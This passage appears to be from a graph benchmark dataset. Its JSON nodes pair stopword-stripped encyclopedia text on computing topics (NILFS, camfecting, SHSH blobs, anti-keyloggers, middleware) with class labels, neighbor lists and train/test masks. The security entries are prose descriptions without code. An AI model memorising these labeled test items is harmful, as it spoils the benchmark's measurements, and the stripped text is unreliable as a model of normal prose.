  {
    "node_id": 1263,
    "label": 6,
    "text": "NILFS:nilfs nilfs nilfs2 new implementation log-structured file system log-structured file system implementation linux kernel developed nippon telegraph telephone corporation ntt cyberspace laboratories community world nilfs released terms gnu general public license gpl nilfs log-structured filesystem storage medium treated like circular buffer new blocks always written end … log-structured filesystems often used flash media since naturally perform wear-leveling … nilfs emphasizes snapshots log-structured approach specific form copy-on-write behavior naturally lends creation filesystem snapshots nilfs developers talk creation continuous snapshots used recover user-initiated filesystem problems … using copy-on-write technique known nothing life free nilfs records data continuous log-like format appended never overwritten approach designed reduce seek times well minimize kind data loss occurs crash conventional file systems example data loss occurs ext3 file systems system crashes write operation system reboots journal notes write complete partial data writes lost file systems like ufs-derived file systems used solaris operating system bsds provide snapshot feature prevents data loss snapshot configuration lengthy large file systems nilfs contrast continuously automatically save instantaneous states file system without interrupting service according ntt labs instantaneous states nilfs continuously saves actually mounted read-only time actual file system mounted read-write — capability useful data recovery hardware failures system crashes lscp list checkpoint command interactive nilfs inspect utility first used find checkpoint address case 2048 checkpoint address used mount checkpoint nilfs provides continuous snapshotting addition versioning capability entire file system users even restore files mistakenly overwritten deleted recent time since nilfs keep consistency like conventional lfs achieves quick recovery system crashes nilfs creates number checkpoints every seconds per synchronous write basis unless change users select significant versions among continuously created checkpoints change snapshots preserved changed back checkpoints limit number snapshots volume gets full snapshot mountable read-only file system mountable concurrently writable mount snapshots feature convenient make consistent backups use possible uses nilfs include versioning tamper detection sox compliance logging data loss recovery current major version nilfs version 2 referred nilfs2 nilfs2 implements online garbage collection reclaim disk space keeping multiple snapshots nilfs features include separate bsd licensed implementation currently read-only support included netbsd january 2015 presentation sd cards filesystems embedded systems linux.conf.au stated nilfs2 filesystem utilities made available gnu public license version 2 exception lib/nilfs libraries header files made available gnu lesser general public license version 2.1 japanese primary authors major contributors codice_1 worked working labs ntt corporation major contributors",
    "neighbors": [
      5120,
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      1775,
      3312,
      3826,
      2291,
      246,
      3834,
      2811,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1264,
    "label": 1,
    "text": "Spectral_Database_for_Organic_Compounds:spectral database organic compounds spectral database organic compounds sdbs free online searchable database hosted national institute advanced industrial science technology aist japan contains spectral data ca 34,000 organic molecules database available english japanese includes six types spectra laser raman spectra electron ionization mass spectra ei-ms fourier-transform infrared ft-ir spectra h nuclear magnetic resonance h-nmr spectra c nuclear magnetic resonance c-nmr spectra electron paramagnetic resonance epr spectra construction database started 1982 spectra acquired recorded aist collections still updated since 1997 database accessed free charge use requires agreeing disclaimer total accumulated number times accessed reached 550 million end january 2015 database contains ca 3,500 raman spectra spectra recorded region 4,000 – 0 cm excitation wavelength 4,800 nm slit width 100 – 200 micrometers collection updated ei-ms spectra measured jeol jms-01sg jeol jms-700 spectrometers electron ionization method electronic accelerating voltage 75 ev ion accelerating voltage 8 – 10 kv direct reservoir inlet systems used accuracy mass number 0.5 collection contains ca 25,000 ei-ms spectra updated ft-ir spectra recorded using nicolet 170sx jasco ft/ir-410 spectrometer spectra recorded nicolet spectrometer data stored intervals 0.5 cm 4,000 – 2,000 cm region 0.25 cm 2,000 – 400 cm region spectral resolution 0.25 cm spectra recorded jasco spectrometer resolution well intervals 0.5 cm samples solids prepared using kbr disc nujol paste methods samples liquids prepared liquid film method collections contains ca 54,100 spectra updated h nmr spectra recorded resonance frequency 400 mhz resolution 0.0625 hz 90 mhz resolution 0.125 hz spectral acquisition carried using flip angle 22.5 – 30.0 degrees pulse repetition time 30 seconds samples prepared dissolution deuterated chloroform cdcl deuterium oxide deuterated dimethylsulfoxide dmso-d spectrum accompanied list peaks respective intensities chemical shifts reported ppm hz spectra show peak assignment collection contains ca 15,900 spectra updated c nmr spectra recorded several spectrometers resonance frequencies ranging 15 mhz 100 mhz resolution ranging 0.025 0.045 ppm spectra acquired using pulse flip angle 22.5 – 45 degrees pulse repetition time 4 – 7 seconds samples prepared dissolution cdcl dmso-d. spectrum accompanied list observed peaks respective chemical shifts ppm intensities spectra show peak assignment collection contains ca 14,200 spectra updated collection contains ca 2,000 spectra measuring conditions sample preparation described particular spectrum collection stopped updated 1987 database searched entering one following parameters chemical name possible request partial full matching molecular formula number different types atoms present molecule single value range values molecular weight single value range values cas registry number sdbs number cases “ ” “ ” used wildcards result search includes available spectra search parameters entered results sorted molecular weight number carbons sdbs number ascending descending order spectrum unknown chemical compound available reverse search carried entering values chemical shift frequency mass peaks nmr ft-ir ei-ms spectrum respectively type search affords chemical compounds database entered spectral characteristics",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 1265,
    "label": 3,
    "text": "Ballyhoo_(video_game):ballyhoo video game ballyhoo interactive fiction computer game designed jeff o'neill published infocom 1985 released ten different 8 16-bit platforms including ms-dos atari st commodore 64 infocom nineteenth game circus-themed plot game tagline big-time suspense big top player character bedazzled spectacle circus mystery performer life attending show tomas munrab travelling circus time forgot player loiters near tents instead rushing exit maybe clowns practice new act perhaps least one trapeze artists trip ... instead player overhears strange conversation circus owner hired drunken inept detective find daughter chelsea kidnapped munrab convinced outside job surely loyal employees would never betray like player begins investigate abduction soon becomes clear circus workers n't appreciate intrusion reactions range indifference hostility attempted murder order unravel mystery player engages series actions straight circus fan dream dressing clown walking high wire taming lions infocom games contained feelies additional items related game enclosed package ballyhoo featured following feelies munrab name circus owner barnum spelled backwards ballyhoo labeled standard difficulty lost treasures infocom bundled 20 infocom releases including ballyhoo package shipped lacked information necessary complete game final page souvenir program omitted page ad classical music radio station one point game player must tune radio frequency listed ad 1170 order proceed compute gazette 1986 called ballyhoo richly evocative often exasperating clever magazine approved splendid feelies surprisingly flexible parser",
    "neighbors": [
      577,
      7116,
      9166,
      625,
      11666,
      627,
      10931
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1266,
    "label": 5,
    "text": "TCP_Wave:tcp wave tcpwave registered trademark tcpwave inc. tcpwave provides computer software managing dns dhcp ip address management ddi tcpwave first ddi company built product manage on-premise dns cloud dns tcpwave ddi built leveraging unique solution combines cloud automation rest api protect enterprise digital resources largest ddos attacks enterprises easily diversify external dns instantaneously add redundancy added simplicity tcpwave nullify effects ddos attack dynamically spooling multiple virtual dns servers needed major public private clouds well private networks one single pane glass diversification automation redundancy ability spawn multiple dns instances demand enterprises absorb ddos attack matter large extending dns multiple public private clouds diversity resiliency challenging manage enterprise organizations recourses needed manage mesh independent cloud providers cumbersome expensive risky done in-correctly many rely large independent external dns provider advertise dns today larger ddos attacks make single source solution risky well tcpwave offers unique solution problem allow clients build manage instantaneously grow external dns network one dash board leverages rest api manage major cloud providers dashboard manages customer private cloud dns internal dns well automatically securely keeping everything sync result one easy manage secure diverse dynamic network spread several unique public private cloud providers benefits tcpwave ipam",
    "neighbors": [
      8865,
      2409,
      10924,
      1935,
      3952
    ],
    "mask": "None"
  },
  {
    "node_id": 1267,
    "label": 3,
    "text": "Feng's_classification:feng classification tse-yun feng suggested use degree parallelism classify various computer architecture based sequential parallel operations bit word level maximum number binary digits processed within unit time computer system called maximum parallelism degree p. processor processing p bits unit time p called maximum degree parallelism let i= 1 2 3 ... different timing instants p p ... p corresponding bits processed processor utilization μ= p/p maximum degree parallelism depends structure arithmetic logic unit higher degree parallelism indicates highly parallel alu processing element average parallelism depends hardware software higher average parallelism achieved concurrent programs according feng ’ classification computer architecture classified four classification based way contents stored memory processed contents either data instructions one bit one selected word processed time represents serial processing needs maximum processing time found existing computers called word slice processing one word n bit processed time bits selected word processed time bit parallel means bits word called bit slice processing m-bit slice processed time word parallel signifies selection words considered one bit words processed time known fully parallel processing array n x bits processes one time maximum parallelism achieved fails project concurrency pipeline processors degree parallelism n't account concurrency handle pipe-lined design",
    "neighbors": [
      2210,
      9932
    ],
    "mask": "None"
  },
  {
    "node_id": 1268,
    "label": 5,
    "text": "Shared_Whois_Project:shared whois project shared whois project swip process used submit maintain update information ensure up-to-date efficient maintenance whois records structured rfc 1491 process updates whois contain information regarding organization using specific ip address specific block addresses additionally provides means track use organization current allocations ip addresses additional allocation ip addresses may justified usage reports case studies may done swip must used within seven days reassignment ip address space downstream customer contrast organization required submit swip template fewer eight ip addresses allocations assignments reassignments blocks 8,192 addresses greater /19 block must approved arin beforehand companies assigned block 65,536 addresses responsible maintaining in-addr.arpa domain records customers two types registration first allocation blocks ip addresses later reallocated reassigned third parties second assignment blocks reassigned recipient end-user",
    "neighbors": [
      5472,
      8204
    ],
    "mask": "Test"
  },
  {
    "node_id": 1269,
    "label": 0,
    "text": "Q-systems:q-systems q-systems method directed graph transformations according given grammar rules developed université de montréal alain colmerauer 1967 -- 70 use natural language processing université de montréal machine translation system taum-73 used q-systems language formalism data structure manipulated q-system q-graph directed acyclic graph one entry node one exit node arc bears labelled ordered tree input sentence usually represented linear q-graph arc bears word tree reduced one node labelled word analysis q-graph usually bundle 1-arc paths arc bearing possible analysis tree generation goal usually produce many paths desired outputs one word per arc q-system consists sequence q-treatments set q-rules form matched_path == added_path condition q-treatments applied sequence unless one produces empty q-graph case result last q-graph obtained three parts rule contain variables labels trees forests variables == must appear matched_path part variables local rules q-treatment works two steps addition cleaning first applies rules exhaustively using instantiation one-way unification thereby adding new paths current q-graph added arcs trees used produce new paths addition process halts arcs used successful rule application erased well unused arcs path entry node exit node hence result addition step terminates q-graph allows several q-systems chained performing specialized task together forming complex system example taum 73 consisted fifteen chained q-systems extension basic idea q-systems namely replace instantiation unification put simply allow new variables right hand side part rule replace parametrized labelled trees logical terms led prolog designed alain colmerauer philippe roussel 1972 refinements direction reducing non-determinism introducing typed labels john chandioux led gramr used programming meteo 1985 onward 2009 hong thai nguyen getalp getalp lig laboratoire d'informatique de grenoble reimplemented q-language c using antlr compile q-systems q-graphs algorithm proposed christian boitet none published sources previous fortran implementation lost implementation corrected completed extended labels using unicode characters printable characters cdc6600 historical version david cattanéo 2010-11",
    "neighbors": [
      5187,
      7780,
      8421,
      1672,
      3276,
      4025,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 1270,
    "label": 7,
    "text": "Pidoco:pidoco pidoco usability suite cloud-based collaboration software pidoco gmbh creating sharing testing wireframes mockups prototypes websites mobile apps enterprise software applications pidoco usability suite cloud-based collaboration software planning designing testing websites web applications mobile apps enterprise software software tool enables users quickly create clickable wireframes mockups interactive low-fidelity prototypes guis without programming using drag-and-drop placement pre-fabricated elements pidoco allows users share projects team members project stakeholders real-time online collaboration reviewing user testing web application used visualize requirements collaborate design phases software development involve end users generate optimized specifications traditional agile development processes pidoco browser-based thus compatible windows mac os linux pidoco structured several views give access various functions functions include pidoco usability suite marketed three editions pidoco usability suite browser-based application runs various operating systems including windows mac os linux supported browsers include internet explorer 7+ firefox 3.0+ chrome 4+ safari 4+ simulation testing functions allow teams collaborate prototypes gathering feedback creating editing prototypes supported firefox 3.0+ chrome 4+ safari 4+ pidoco javascript/svg-based tool uses open web standards offered software-as-a-service saas model require download installation software accessed online via application homepage broad-band internet connection web browser software necessary use pidoco software pidoco operates software-as-a-service saas model available standard hosted saas option hosted dedicated server option in-house installation attributes saas include flexibility scalability multi-tenant capability recurring subscription fees rather upfront capital cost require internal hardware",
    "neighbors": [
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1271,
    "label": 4,
    "text": "Camfecting:camfecting camfecting field computer security process attempting hack person webcam activate without webcam owner permission remotely activated webcam used watch anything within webcam field vision sometimes including webcam owner camfecting often carried infecting victim computer virus provide hacker access webcam attack specifically targeted victim webcam hence name camfecting portmanteau words camera infecting typically webcam hacker camfecter sends victim innocent-looking application hidden trojan software camfecter control victim webcam camfecter virus installs silently victim runs original application installed camfecter turn webcam capture pictures/videos camfecter software works like original webcam software present victim computer difference camfecter controls software instead webcam owner marcus thomas former assistant director fbi operational technology division quantico said 2013 story washington post fbi able covertly activate computer camera—without triggering light lets users know recording—for several years november 2013 american teenager jared james abrahams pleaded guilty hacking 100-150 women installing highly invasive malware blackshades computers order obtain nude images videos one victims miss teen usa 2013 cassidy wolf researchers johns hopkins university shown covertly capture images isight camera macbook imac models released 2008 reprogramming microcontroller firmware recently webcam privacy software introduced companies stop watched webcamlock software exposes access webcam prompts user allow deny access showing program trying access webcam allowing user accept trusted program user recognizes terminate attempt immediately companies market soomz.io manufacture sell sliding lens covers allow users retrofit computer close access camera lens computer reasonably up-to-date webcam software anti-virus firewall software installed operational may increased risk camfecting softcams may nominally increase risk maintained configured properly",
    "neighbors": [
      3996,
      10756,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1272,
    "label": 4,
    "text": "Time-delay_combination_locks:time-delay combination locks time-delay combination lock commonly digital electronic combination lock equipped delay timer delays unlocking lock user-definable delay period usually less one hour unlike time lock unlocks preset time case bank vault time-delay locks operate time safe unlocked operator must wait set delay period elapse lock opened time delay safes commonly used businesses high cash transactions used banks like nationwide hsbc barclays halifax time-delay combination locks frequently incorporated money safes armed robbery deterrent many instances time-delay combination locks also equipped duress code may entered activate time delay whilst sending silent alarm monitoring centre modern time delay combination locks many functions multiple different codes pre-set time lock settings open close times pre-set vacation times e.g christmas day dual code facility full audit trail providing detailed record lock history showing opened lock long open also use non-volatile memory information lost batteries go flat allow safe opened batteries changed pre-set time correct code entered electronic combination locks time-delay feature require code entered twice start timer second unlock open safe entered delay period expired",
    "neighbors": [
      10529,
      3226,
      2020
    ],
    "mask": "Test"
  },
  {
    "node_id": 1273,
    "label": 4,
    "text": "Ipfirewall:ipfirewall ipfirewall ipfw freebsd ip stateful firewall packet filter traffic accounting facility ruleset logic similar many packet filters except ipfilter ipfw authored maintained freebsd volunteer staff members syntax enables use sophisticated filtering capabilities thus enables users satisfy advanced requirements either used loadable kernel module incorporated kernel use loadable kernel module possible highly recommended ipfw built-in firewall mac os x mac os x 10.7 lion 2011 replaced openbsd project pf like freebsd ipfw open source used many freebsd-based firewall products including m0n0wall freenas port ipfw dummynet traffic shaper available linux openwrt microsoft windows wipfw windows port old 2001 version ipfw",
    "neighbors": [
      2049,
      2563,
      10761,
      4636,
      550,
      10790,
      1071,
      8753,
      9784,
      569,
      5177,
      5178,
      9279,
      2118,
      8266,
      5710,
      7249,
      9306,
      607,
      9824,
      10851,
      1637,
      2149,
      8816,
      9844,
      10872,
      9343,
      2180,
      1164,
      6797,
      10387,
      1172,
      2212,
      3243,
      684,
      1708,
      3248,
      1718,
      5819,
      10433,
      11459,
      9927,
      8395,
      8909,
      4814,
      9423,
      6864,
      10451,
      10455,
      6361,
      8410,
      6363,
      6364,
      5860,
      10987,
      8943,
      11506,
      9971,
      9983,
      1792,
      7425,
      1801,
      274,
      9496,
      6431,
      10531,
      5924,
      6438,
      8998,
      10535,
      4908,
      3885,
      9009,
      11573,
      823,
      11577,
      11073,
      1858,
      10574,
      850,
      4435,
      9048,
      4953,
      2907,
      6491,
      5472,
      7521,
      9569,
      1891,
      3942,
      8554,
      7027,
      2421,
      2424,
      4480,
      1927,
      9625,
      1946,
      3482,
      1436,
      4511,
      11184,
      11698,
      1465,
      3006,
      9151,
      5057,
      7121,
      10708,
      4568,
      4571,
      3551,
      5093,
      998,
      4073,
      2545,
      3058,
      9201,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1274,
    "label": 8,
    "text": "FAROO:faroo faroo universal web search engine based peer-to-peer technology uses distributed crawler stores search data users computers instead central server whenever user visits website automatically indexed distributed network ranking done comparing usage statistics users web pages visited amount time spent page whether pages bookmarked printed",
    "neighbors": [
      8640,
      7656,
      7276,
      6797,
      7983,
      3573,
      7807
    ],
    "mask": "Train"
  },
  {
    "node_id": 1275,
    "label": 4,
    "text": "United_Kingdom_government_security_breaches:united kingdom government security breaches page time-line published security lapses committed governmental entities uk including data security breaches article attempt capture security vulnerabilities",
    "neighbors": [
      2945,
      5636,
      5726
    ],
    "mask": "Test"
  },
  {
    "node_id": 1276,
    "label": 4,
    "text": "SHSH_blob:shsh blob shsh blob term small piece data part apple digital signature protocol ios restores updates designed control ios versions users install ios devices iphones ipads ipod touches apple tvs generally allowing newest ios version installable process controlled tatsu tss signing server gs.apple.com updates restores completed itunes version ios signed developers interested ios jailbreaking made tools working around signature system order install jailbreakable older ios versions longer signed apple shsh blobs also called ecid shsh unofficial term referring digital signatures apple generates uses personalize ipsw ios firmware files device part apple protocol designed ensure trusted software installed device apple public name process system software personalization system software authorization ios 7+ shsh blobs created hashing formula multiple keys including device type ios version signed device ecid unique identification number embedded hardware apple wishes restrict users ability restore devices particular ios version apple refuse generate hash restore attempt restore successful least require bypassing intended function system protocol part iphone 3gs later devices itunes restores updates ios firmware apple added many checkpoints ios version installed on-device consolidation begins first verifying iphone software itunes communicates gs.apple.com verify ipsw file provided still signed tatsu server give back list versions signed version signed ibec iboot decline image giving error error 3194 declined authorize image itunes communicate iboot throughout process update restore ensuring firmware modified custom firmware cfw itunes update restore device suspects file modified chain process firmware installed iboot verify iboot iboot verify bootloader install unsigned ios versions unless 1 shsh2 blobs exploits released 2 exploit chain process ios 3 4 shsh blobs made static keys device type ios version ecid meant shsh blobs specific ios version device would upon every restore subvert system using man-in-the-middle attack server requests unique shsh blobs apple jailbroken device caches shsh blobs servers user changes hosts file computer redirect shsh blobs check cache instead apple servers itunes would tricked checking cached shsh blobs allowing device restored version ios 5 later versions ios implement addition system random number cryptographic nonce apticket making simple replay attack longer effective versions redsn0w 0.9.9b9 include way bypass nonce requirement ios 5 allowing shsh blobs apticket replayed stitching custom firmware first released 2009 tinytss umbrella tinyumbrella tool finding information shsh blobs saved third party servers saving shsh blobs locally running local server replay shsh blobs trick itunes restoring older devices ios 3 4 june 2011 ih8sn0w released ifaith tool grab partial shsh blobs device currently-installed ios version limited iphone 4 older devices late 2011 iphone dev team added comprehensive shsh blob management features redsn0w including ability save shsh blobs aptickets stitch custom firmware order restore device ios 5 later replaying shsh blobs newer devices ipad 2 later always possible boot rom hardware level exploits available devices october 2012 redsn0w includes features restoring newer devices different versions ios 5 downgrade newer devices ios 6 ios 5",
    "neighbors": [
      11137,
      9732,
      6539,
      6770,
      3286,
      8694,
      2811,
      4957,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 1277,
    "label": 9,
    "text": "Command_substitution:command substitution computing command substitution facility allows command run output pasted back command line arguments another command command substitution first appeared bourne shell introduced version 7 unix 1979 remained characteristic later unix shells feature since adopted programming languages well including perl php ruby microsoft powershell windows also appears microsoft cmd.exe codice_1 command codice_2 command shells typically implement command substitution creating child process run first command standard output piped back shell reads output parsing words separated whitespace shell ca n't know output child pipe closes child dies waits starts another child process run second command c shell example shows one might search c files containing string codice_3 using codice_4 edit found using codice_5 editor syntactical notation shown codice_6 ... codice_6 using backquotes delimiters original style supported common unix shells objections raised syntax typed semantics works easy type important factor interactive command processor syntax criticized awkward nest putting one command substitution inside another left right delimiters korn shell ksh solved alternative notation codice_8 ... codice_9 borrowing notational style used variable substitution today unix shells support syntax microsoft powershell also uses notation semantics semantics breaking output words whitespace also criticized worked well early unix systems filenames never contained spaces n't work well modern windows linux systems filenames certainly contain spaces either previous examples filenames matched codice_10 wildcard contains space filename broken two separate arguments codice_5 clearly intended hamilton c shell solved double backquote notation codice_12 ... codice_12 parses words line breaks example command substitution using codice_14 operator powershell related facility expression substitution found languages common lisp scheme invoked using comma-at operator expression marked backquote quasiquote operator abc using expression enclosed backquotes inside text display string literal example abc command produces output",
    "neighbors": [
      5888,
      8582,
      2062,
      9871,
      3856,
      5399,
      9245,
      4398,
      11442,
      8499,
      823,
      5698,
      8644,
      8262,
      2786,
      6498,
      9444,
      10083,
      5492,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1278,
    "label": 2,
    "text": "HP_Multi-Programming_Executive:hp multi-programming executive mpe multi-programming executive discontinued business-oriented mainframe computer real-time operating system made hewlett-packard initially mini-mainframe final high-end systems supported 12 cpus 2000 simultaneous users runs hp 3000 family computers originally used hp custom 16-bit stack architecture cisc cpus later migrated pa-risc operating system called mpe xl 1983 original version mpe written language called spl system programming language mpe xl written primarily hp pascal assembly language old spl code 1992 os name changed mpe/ix indicate unix interoperability addition posix compatibility discontinuance product line announced late 2001 support hp terminating end 2010 number 3rd party companies still support hardware software 1998 hp released last version mpe/ix 6.0 among others mpe/ix supports following list common commands programs",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      58,
      576,
      1606,
      8262,
      2638,
      10333,
      97,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      3248,
      6837,
      8388,
      9932,
      1741,
      5840,
      1750,
      7382,
      8410,
      9946,
      1253,
      1776,
      8944,
      5363,
      2804,
      2811,
      10499,
      5384,
      1804,
      273,
      11539,
      10016,
      6434,
      2345,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      8524,
      5457,
      11601,
      10590,
      8551,
      5492,
      3960,
      4998,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      11184,
      6075,
      1469,
      6078,
      9151,
      8136,
      477,
      6128,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 1279,
    "label": 4,
    "text": "Anti-keylogger:anti-keylogger anti-keylogger anti–keystroke logger type software specifically designed detection keystroke logger software often software also incorporate ability delete least immobilize hidden keystroke logger software computer comparison anti-virus anti-spyware software primary difference anti-keylogger make distinction legitimate keystroke-logging program illegitimate keystroke-logging program malware keystroke-logging programs flagged optionally removed whether appear legitimate keystroke-logging software keyloggers sometimes part malware packages downloaded onto computers without owners knowledge detecting presence keylogger computer difficult so-called anti- keylogging programs developed thwart keylogging systems often effective used properly anti-keyloggers used large organizations well individuals order scan remove cases simply immobilize keystroke logging software computer generally advised software developers anti-keylogging scans run regular basis order reduce amount time keylogger may record keystrokes example system scanned every three days maximum three days keylogger could hidden system recording keystrokes public computers extremely susceptible installation keystroke logging software hardware documented instances occurring public computers particularly susceptible keyloggers number people gain access machine install hardware keylogger software keylogger either secretly installed matter minutes anti-keyloggers often used daily basis ensure public computers infected keyloggers safe public use keyloggers prevalent online gaming industry used secretly record gamer access credentials user name password logging account information sent back hacker hacker sign later account change password account thus stealing world warcraft particular importance game hackers target numerous keylogging viruses anti-keyloggers used many world warcraft gaming community members order try keep gaming accounts secure financial institutions become target keyloggers particularly institutions use advanced security features pin pads screen keyboards anti-keyloggers used run regular scans computer banking client information accessed protecting passwords banking information credit card numbers identity thieves common use anti-keylogger individuals wishing protect privacy using computer uses range protecting financial information used online banking passwords personal communication virtually information may typed computer keyloggers often installed people known computer owner many times installed ex-partner hoping spy ex-partner activities particularly chat type software signature base strategic information helps uniquely identify keylogger list contains many known keyloggers possible vendors make effort availability up-to-date listing download customers time 'system scan run software compares contents hard disk drive item item list looking matches type software rather widespread one drawbacks biggest drawback signature-based anti-keyloggers one protected keyloggers found signature-base list thus staying vulnerable unknown unrecognized keyloggers criminal download one many famous keyloggers change enough anti-keylogger wo n't recognize software n't use signature bases uses checklist known features attributes methods keyloggers known use analyzes methods work modules pc thus blocking activity module similar work keyloggers though method gives better keylogging protection signature-based anti-keyloggers drawbacks one type software blocks non-keyloggers also several 'non-harmful software modules either part operating system part legitimate apps use processes keyloggers also use trigger false positive usually non signature-based keyloggers option allow user unblock selected modules cause difficulties inexperienced users unable discern good modules bad modules manually choosing block unblock",
    "neighbors": [
      3072,
      6786,
      5764,
      7044,
      8197,
      647,
      10245,
      10756,
      9227,
      9356,
      9102,
      9488,
      7441,
      8978,
      4883,
      9233,
      4245,
      278,
      10392,
      1690,
      3867,
      9242,
      10141,
      5281,
      9761,
      2213,
      8998,
      9256,
      939,
      300,
      9771,
      1970,
      4023,
      10297,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      8387,
      4165,
      2508,
      3032,
      4314,
      7515,
      4344,
      9187,
      3941,
      11621,
      107,
      877,
      9591,
      3320,
      2041,
      5245,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 1280,
    "label": 7,
    "text": "Message-oriented_middleware:message-oriented middleware message-oriented middleware mom software hardware infrastructure supporting sending receiving messages distributed systems mom allows application modules distributed heterogeneous platforms reduces complexity developing applications span multiple operating systems network protocols middleware creates distributed communications layer insulates application developer details various operating systems network interfaces apis extend across diverse platforms networks typically provided mom middleware layer allows software components applications enterprise javabeans servlets components developed independently run different networked platforms interact one another applications distributed different network nodes use application interface communicate addition providing administrative interface new virtual system interconnected applications made reliable secure mom provides software elements reside communicating components client/server architecture typically support asynchronous calls client server applications mom reduces involvement application developers complexity master-slave nature client/server mechanism models make possible one software component affect behavior another component network different rpc- orb-based middleware create systems tightly coupled components whereas mom-based systems allow looser coupling components rpc- orb-based system one procedure calls another must wait called procedure return anything else synchronous messaging models middleware functions partly super-linker locating called procedure network using network services pass function method parameters procedure return results central reasons using message-based communications protocol include ability store buffer route transform messages conveying senders receivers another advantage messaging provider mediated messaging clients adding administrative interface monitor tune performance client applications thus effectively relieved every problem except sending receiving processing messages code implements mom system administrator resolve issues like interoperability reliability security scalability performance using mom system client makes api call send message destination managed provider call invokes provider services route deliver message sent message client continue work confident provider retains message receiving client retrieves message-based model coupled mediation provider makes possible create system loosely coupled components mom comprises category inter-application communication software generally relies asynchronous message-passing opposed request-response architecture asynchronous systems message queues provide temporary storage destination program busy connected addition asynchronous mom systems provide persistent storage back message queue means sender receiver need connect network time asynchronous delivery problems intermittent connectivity solved also means receiver application fail reason senders continue unaffected messages send simply accumulate message queue later processing receiver restarts many message-oriented middleware implementations depend message queue system implementations permit routing logic provided messaging layer others depend client applications provide routing information allow mix paradigms implementations make use broadcast multicast distribution paradigms message-based middleware system message received destination need identical message originally sent mom system built-in intelligence transform messages en route match requirements sender recipient conjunction routing broadcast/multicast facilities one application send message native format two applications may receive copy message native format many modern mom systems provide sophisticated message transformation mapping tools allow programmers specify transformation rules applicable simple gui drag-and-drop operation primary disadvantage many message-oriented middleware systems require extra component architecture message transfer agent message broker system adding another component lead reductions performance reliability also make system whole difficult expensive maintain addition many inter-application communications intrinsically synchronous aspect sender specifically wanting wait reply message continuing see real-time computing near-real-time extreme cases message-based communication inherently functions asynchronously may fit well situations said mom systems facilities group request response single pseudo-synchronous transaction synchronous messaging system calling function return called function finished task loosely coupled asynchronous system calling client continue load work upon recipient resources needed handle work depleted called component fails course conditions minimized avoided monitoring performance adjusting message flow work needed synchronous messaging system important thing understand advantages liabilities kind system system appropriate different kinds tasks sometimes combination two kinds systems required obtain desired behavior historically lack standards governing use message-oriented middleware caused problems major vendors implementations application programming interface api management tools one long-standing standards message oriented middleware x/open group xatmi specification distributed transaction processing xatmi specification standardizes api interprocess communications known implementations api atr baltic enduro/x middleware oracle tuxedo advanced message queuing protocol amqp approved oasis iso standard defines protocol formats used participating application components implementations interoperable amqp may used flexible routing schemes including common messaging paradigms like point-to-point fan-out publish/subscribe request-response note intentionally omitted v1.0 protocol standard rely particular implementation and/or underlying network protocol routing also supports transaction management queuing distribution security management clustering federation heterogeneous multi-platform support java applications use amqp typically written java jms implementations provide apis c c++ php python ruby languages high-level architecture hla ieee 1516 ieee siso standard simulation interoperability defines set services provided api c++ java services offer publish/subscribe based information exchange based modular federation object model also services coordinated data exchange time advance based logical simulation time well synchronization points additional services provide transfer ownership data distribution optimizations monitoring management participating federates systems mq telemetry transport mqtt iso standard iso/iec prf 20922 supported oasis organization provides lightweight publish/subscribe reliable messaging transport protocol top tcp/ip suitable communication m2m/iot contexts small code footprint required and/or network bandwidth premium object management group data distribution service dds provides message-oriented publish/subscribe p/s middleware standard aims enable scalable real-time dependable high performance interoperable data exchanges publishers subscribers standard provides interfaces c++ c++11 c ada java ruby extensible messaging presence protocol xmpp communications protocol message-oriented middleware based xml extensible markup language designed extensible protocol also used publish-subscribe systems signalling voip video file transfer gaming internet things applications smart grid social networking services unlike instant messaging protocols xmpp defined open standard uses open systems approach development application anyone may implement xmpp service interoperate organizations implementations xmpp open protocol implementations developed using software license although many server client library implementations distributed free open-source software numerous freeware commercial software implementations also exist internet engineering task force ietf formed xmpp working group 2002 formalize core protocols ietf instant messaging presence technology xmpp working group produced four specifications rfc 3920 rfc 3921 rfc 3922 rfc 3923 approved proposed standards 2004 2011 rfc 3920 rfc 3921 superseded rfc 6120 rfc 6121 respectively rfc 6122 specifying xmpp address format addition core protocols standardized ietf xmpp standards foundation formerly jabber software foundation active developing open xmpp extensions xmpp-based software deployed widely across internet according xmpp standards foundation forms basis department defense dod unified capabilities framework java ee programming environment provides standard api called jms java message service implemented mom vendors aims hide particular mom api implementations however jms define format messages exchanged jms systems interoperable similar effort actively evolving openmama project aims 